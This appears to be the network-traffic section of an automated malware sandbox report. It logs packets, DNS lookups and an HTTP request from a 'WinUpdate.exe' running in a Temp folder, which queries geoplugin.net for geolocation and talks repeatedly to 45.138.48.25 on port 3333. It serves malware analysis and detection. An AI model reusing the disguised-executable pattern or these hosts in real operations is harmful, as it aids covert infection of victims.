                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:26:04.817030907 CET497123333192.168.2.645.138.48.25
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:26:04.936887980 CET33334971245.138.48.25192.168.2.6
                                                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:08.225553989 CET6357353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:08.365704060 CET53635731.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:16.093961000 CET53537501.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:16.299290895 CET53514501.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:18.928126097 CET5419753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:18.928400993 CET4984353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.065877914 CET53541971.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.066020012 CET53498431.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.662147045 CET5214753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.662259102 CET4917653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.800556898 CET53491761.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.031363964 CET5402853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.031541109 CET5080353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.963105917 CET6030153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.963645935 CET5646053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.100370884 CET53603011.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.108494043 CET53564601.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.783602953 CET5449753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.783802986 CET5394353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.787597895 CET5271453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.787597895 CET6547553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.921104908 CET53544971.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.921129942 CET53539431.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.925640106 CET6419053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.925792933 CET4945453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.063118935 CET53494541.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.064368963 CET5541753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.064538002 CET5099653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.202049971 CET53509961.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.627125978 CET6503253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.627346992 CET6495853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.627634048 CET5860453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.627757072 CET5533753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.635376930 CET5385453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.635829926 CET6295353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.679860115 CET6374953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.680275917 CET5568953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.684202909 CET5983853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.684309006 CET6072153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.685148954 CET5852353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.685338974 CET5570453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.764544964 CET53650321.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.764559031 CET53649581.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.764930010 CET53586041.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.765161037 CET53553371.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.773189068 CET53538541.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.773286104 CET53629531.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.817727089 CET53637491.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.817800999 CET53556891.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.821599960 CET53607211.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.821619034 CET53598381.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.822485924 CET53557041.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.822556973 CET53585231.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.676132917 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:33.984726906 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.590543985 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.844666004 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.844697952 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.844705105 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.844835043 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.845662117 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.855612040 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.871814966 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.914401054 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.934323072 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.934680939 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.934957027 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.949856043 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.179429054 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.179487944 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.179492950 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.179510117 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.179920912 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.179991007 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.197360992 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.197875977 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.197999001 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.198698044 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.220392942 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.243902922 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.258521080 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.258564949 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.258794069 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.273303986 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.306448936 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.306710958 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.503429890 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.543654919 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.567822933 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.568605900 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.583029985 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.583996058 CET44364196162.159.61.3192.168.2.6
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:35.584208965 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:36.866265059 CET64196443192.168.2.6162.159.61.3
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:25:40.332706928 CET138138192.168.2.6192.168.2.255
                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.764616013 CET192.168.2.61.1.1.1c211(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:08.225553989 CET192.168.2.61.1.1.10x9a93Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:18.928126097 CET192.168.2.61.1.1.10xc1c3Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:18.928400993 CET192.168.2.61.1.1.10x7fc5Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.662147045 CET192.168.2.61.1.1.10x8e49Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.662259102 CET192.168.2.61.1.1.10x5c83Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.031363964 CET192.168.2.61.1.1.10xd0cStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.031541109 CET192.168.2.61.1.1.10x1d64Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.963105917 CET192.168.2.61.1.1.10x9b04Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.963645935 CET192.168.2.61.1.1.10x2e7bStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.783602953 CET192.168.2.61.1.1.10x86a4Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.783802986 CET192.168.2.61.1.1.10x38c0Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.787597895 CET192.168.2.61.1.1.10xf5ceStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.787597895 CET192.168.2.61.1.1.10xad14Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.925640106 CET192.168.2.61.1.1.10x2c08Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.925792933 CET192.168.2.61.1.1.10x59c4Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.064368963 CET192.168.2.61.1.1.10x38a3Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.064538002 CET192.168.2.61.1.1.10x3972Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.627125978 CET192.168.2.61.1.1.10xb62eStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.627346992 CET192.168.2.61.1.1.10x3575Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.627634048 CET192.168.2.61.1.1.10x18a3Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.627757072 CET192.168.2.61.1.1.10x3004Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.635376930 CET192.168.2.61.1.1.10xe6e0Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.635829926 CET192.168.2.61.1.1.10x9815Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.679860115 CET192.168.2.61.1.1.10x5fa4Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.680275917 CET192.168.2.61.1.1.10xdccbStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.684202909 CET192.168.2.61.1.1.10xc620Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.684309006 CET192.168.2.61.1.1.10x45e6Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.685148954 CET192.168.2.61.1.1.10xfd42Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.685338974 CET192.168.2.61.1.1.10xf4b0Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:08.365704060 CET1.1.1.1192.168.2.60x9a93No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.065877914 CET1.1.1.1192.168.2.60xc1c3No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.065877914 CET1.1.1.1192.168.2.60xc1c3No error (0)googlehosted.l.googleusercontent.com172.217.19.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:19.066020012 CET1.1.1.1192.168.2.60x7fc5No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.800043106 CET1.1.1.1192.168.2.60x8e49No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:26.800556898 CET1.1.1.1192.168.2.60x5c83No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.198856115 CET1.1.1.1192.168.2.60x25aNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.198856115 CET1.1.1.1192.168.2.60x25aNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:27.230582952 CET1.1.1.1192.168.2.60x62bbNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.168663025 CET1.1.1.1192.168.2.60x1d64No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:29.172388077 CET1.1.1.1192.168.2.60xd0cNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.100370884 CET1.1.1.1192.168.2.60x9b04No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.100370884 CET1.1.1.1192.168.2.60x9b04No error (0)googlehosted.l.googleusercontent.com172.217.19.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.108494043 CET1.1.1.1192.168.2.60x2e7bNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.921104908 CET1.1.1.1192.168.2.60x86a4No error (0)sb.scorecardresearch.com18.165.220.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.921104908 CET1.1.1.1192.168.2.60x86a4No error (0)sb.scorecardresearch.com18.165.220.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.921104908 CET1.1.1.1192.168.2.60x86a4No error (0)sb.scorecardresearch.com18.165.220.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.921104908 CET1.1.1.1192.168.2.60x86a4No error (0)sb.scorecardresearch.com18.165.220.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.924714088 CET1.1.1.1192.168.2.60xf5ceNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:30.925380945 CET1.1.1.1192.168.2.60xad14No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.063118935 CET1.1.1.1192.168.2.60x59c4No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.063182116 CET1.1.1.1192.168.2.60x2c08No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.201709986 CET1.1.1.1192.168.2.60x38a3No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.202049971 CET1.1.1.1192.168.2.60x3972No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.764544964 CET1.1.1.1192.168.2.60xb62eNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.764544964 CET1.1.1.1192.168.2.60xb62eNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.764559031 CET1.1.1.1192.168.2.60x3575No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.764930010 CET1.1.1.1192.168.2.60x18a3No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.764930010 CET1.1.1.1192.168.2.60x18a3No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.765161037 CET1.1.1.1192.168.2.60x3004No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.773189068 CET1.1.1.1192.168.2.60xe6e0No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.773189068 CET1.1.1.1192.168.2.60xe6e0No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.773286104 CET1.1.1.1192.168.2.60x9815No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.817727089 CET1.1.1.1192.168.2.60x5fa4No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.817727089 CET1.1.1.1192.168.2.60x5fa4No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.817800999 CET1.1.1.1192.168.2.60xdccbNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.821599960 CET1.1.1.1192.168.2.60x45e6No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.821619034 CET1.1.1.1192.168.2.60xc620No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.821619034 CET1.1.1.1192.168.2.60xc620No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.822485924 CET1.1.1.1192.168.2.60xf4b0No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.822556973 CET1.1.1.1192.168.2.60xfd42No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:31.822556973 CET1.1.1.1192.168.2.60xfd42No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.824129105 CET1.1.1.1192.168.2.60x8adeNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:34.824129105 CET1.1.1.1192.168.2.60x8adeNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              • fs.microsoft.com
                                                                                                                                                                                                                                                                                              • otelrules.azureedge.net
                                                                                                                                                                                                                                                                                              • slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                              • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                              • api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                              • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                              • geoplugin.net
                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              0192.168.2.649718178.237.33.5080672C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:08.492760897 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                                                                                                              Host: geoplugin.net
                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                              Nov 28, 2024 07:22:09.868638039 CET1171INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              date: Thu, 28 Nov 2024 06:22:09 GMT
                                                                                                                                                                                                                                                                                              server: Apache
                                                                                                                                                                                                                                                                                              content-length: 963
                                                                                                                                                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                              cache-control: public, max-age=300
                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
